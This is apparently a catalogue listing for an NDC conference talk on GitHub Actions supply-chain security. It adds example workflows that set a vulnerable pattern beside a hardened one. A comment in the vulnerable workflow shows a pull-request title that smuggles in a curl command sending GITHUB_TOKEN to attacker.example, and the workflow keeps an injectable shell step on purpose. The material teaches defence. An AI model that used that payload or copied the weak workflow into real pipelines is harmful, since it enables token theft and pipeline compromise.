Overview
Learn how to turn GitHub Actions from a supply chain liability into a supply chain defense in this conference talk. The talk examines the security risks built into CI/CD automation: leaked tokens, script injection through untrusted event data (for example a pull request title interpolated into a shell step), untrusted third-party Actions, and compromised runners. Any of these can become a supply chain attack through malicious code injection, credential theft, or tampering with a release.

It then covers concrete countermeasures: applying the principle of least privilege to GITHUB_TOKEN and replacing long-lived cloud secrets with OIDC-issued short-lived credentials, vetting and pinning third-party Actions, securing runners, and hardening workflows through input handling and code signing. Real-world incidents are used to show how ordinary misconfigurations become attack vectors and why automated pipelines need the same scrutiny as production code, so that CI/CD becomes a sentinel for the supply chain rather than its weakest link.
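As an added example that is not material from the talk or from NDC, the two workflow files below contrast the misconfigurations the description lists with their hardened forms: an unrestricted GITHUB_TOKEN versus an explicit least-privilege permissions block, a mutable version tag versus a commit SHA pin, a shell step that interpolates a pull request title versus one that passes it through an environment variable, and static cloud keys versus OIDC. The repository layout, bucket name, IAM role ARN and region are hypothetical; the checkout SHA is the published commit for actions/checkout v4.1.1 at the time of writing and the configure-aws-credentials SHA is left as a placeholder, so both must be verified against the upstream tags before use.

```yaml
# Added illustration, not code from the talk. Two separate workflow files are
# shown in one block, separated by a YAML document marker, so the weak and the
# hardened form can be read side by side. Bucket, role ARN and region are
# hypothetical; re-verify every pinned SHA against the upstream tag.

# ---- .github/workflows/pr-weak.yml (the pattern to avoid) ----------------
name: pr-check-weak
on: [pull_request]
# No 'permissions' block: GITHUB_TOKEN gets the repository or organization
# default, which may be read and write on nearly every scope.
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      # Mutable tag: whoever can move the tag controls the code this job runs.
      - uses: actions/checkout@v4
      # Script injection: the PR title is substituted into the script text
      # before bash parses it. A title such as
      #   a"; curl -d "$GITHUB_TOKEN" https://attacker.example; echo "
      # runs the attacker's command with the job's token.
      - run: echo "Checking PR: ${{ github.event.pull_request.title }}"
      # Long-lived cloud keys stored as repository secrets: one leak is valid
      # until someone notices and rotates them.
      - run: aws s3 cp build/ s3://example-release-bucket --recursive
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
---
# ---- .github/workflows/pr-hardened.yml -----------------------------------
name: pr-check-hardened
on:
  pull_request:
  push:
    branches: [main]
# Least privilege for GITHUB_TOKEN: deny everything at the workflow level,
# then grant each job only the scopes it needs.
permissions: {}
jobs:
  check:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      # Pin Actions to a full commit SHA; keep the version in a comment so
      # Dependabot or Renovate can still propose updates.
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
        with:
          # Do not leave the token in .git/config for later steps to read.
          persist-credentials: false
      # Untrusted event data goes through an environment variable, so bash
      # receives it as data and never as part of the script text.
      - name: Report PR title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'Checking PR: %s\n' "$PR_TITLE"

  publish:
    needs: check
    # Only publish from a trusted ref; pull_request events never reach here.
    if: github.event_name == 'push' && github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write   # needed to mint the OIDC token for the cloud provider
    steps:
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
        with:
          persist-credentials: false
      # OIDC: the cloud-side trust policy restricts this role to this
      # repository and branch, and the credentials expire with the job.
      # Placeholder SHA: look up and pin the audited commit for the v4 tag.
      - uses: aws-actions/configure-aws-credentials@<full-commit-sha> # v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/gha-release   # hypothetical
          aws-region: us-east-1
      - run: aws s3 cp build/ s3://example-release-bucket --recursive
```

The hardened file still deserves the checks the talk recommends: confirm the repository's default token permission is read-only so a forgotten permissions block fails closed, review the source of every pinned commit rather than only its tag, and keep pull_request_target out of workflows that check out or execute code from the pull request head.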
Syllabus
GitHub Actions Security: From CI Nightmare to Supply Chain Sentinel - Niek Palm - NDC Manchester
Taught by
NDC Conferences